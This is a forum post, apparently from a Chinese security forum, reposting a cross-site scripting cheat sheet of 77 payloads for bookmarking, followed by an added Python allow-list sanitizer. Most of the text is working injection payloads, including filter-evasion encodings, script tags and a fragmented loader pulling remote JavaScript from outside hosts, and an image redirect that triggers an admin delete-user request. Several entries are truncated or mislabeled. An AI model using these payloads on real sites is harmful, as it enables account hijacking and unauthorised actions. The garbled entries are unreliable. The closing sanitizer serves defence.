It seems there isn't much XSS material on t00ls, so I'm copying over something good I came across, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (encoding calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (encoding calculator)
<IMG SRC=jav ...omitted... S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (encoding calculator)
<IMG SRC=jav ...omitted... S')>

(10) Hex encoding, also without semicolons (encoding calculator)
<IMG SRC=java ...omitted... XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective in China, as there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough to start a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image file and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal (dword) IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
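Most of the vectors above belong to one of two families: obfuscating the scheme of a URL-bearing attribute (items 3-19, 40) or feeding the HTML parser junk that a regex filter does not expect (items 20-27, 61-67). The sanitizer below is an added example, not part of the original post or of the cheat sheet it copies: it normalises attribute values the way a lenient browser does before checking the scheme, and rebuilds markup from parsed tokens against an allow-list instead of pattern-matching the raw text. The tag/attribute allow-list and the safe-scheme set are assumptions chosen for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list of tags and the attributes each may keep; anything else is dropped.
ALLOWED = {"a": {"href"}, "b": set(), "i": set(), "p": set(),
           "ul": set(), "li": set(), "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
# Chars browsers ignore inside a URL scheme: NUL, tab, CR/LF, space (items 11-14, 17, 19).
_IGNORED = re.compile(r"[\x00-\x20]")

def safe_url(value):
    """Decode character references (items 5, 8-10), strip ignored characters,
    lower-case (item 4), then allow only relative URLs or a listed scheme."""
    norm = _IGNORED.sub("", html.unescape(value)).lower()
    m = re.match(r"^([a-z][a-z0-9+.\-]*):", norm)
    return m is None or m.group(1) in SAFE_SCHEMES

class Sanitizer(HTMLParser):
    """Rebuild markup from parser tokens instead of regex-filtering raw text, so
    <SCRIPT/XSS ...>, <<SCRIPT> and a=">" (items 20-27, 61-67) are seen as a browser sees them."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], 0  # skipping > 0 inside a dropped script/style

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping += 1
        elif not self.skipping and tag in ALLOWED:
            kept = [f' {n}="{html.escape(v, quote=True)}"' for n, v in attrs
                    if n in ALLOWED[tag] and v is not None
                    and (n not in URL_ATTRS or safe_url(v))]
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = max(0, self.skipping - 1)
        elif not self.skipping and tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:  # script/style bodies are dropped whole
            self.out.append(html.escape(data, quote=False))

def sanitize(markup):
    p = Sanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out)
```

Note that the destination tricks in items 68-76 are untouched by a scheme check: they concern where a permitted http: link points, which is a matter of link policy, not markup sanitisation.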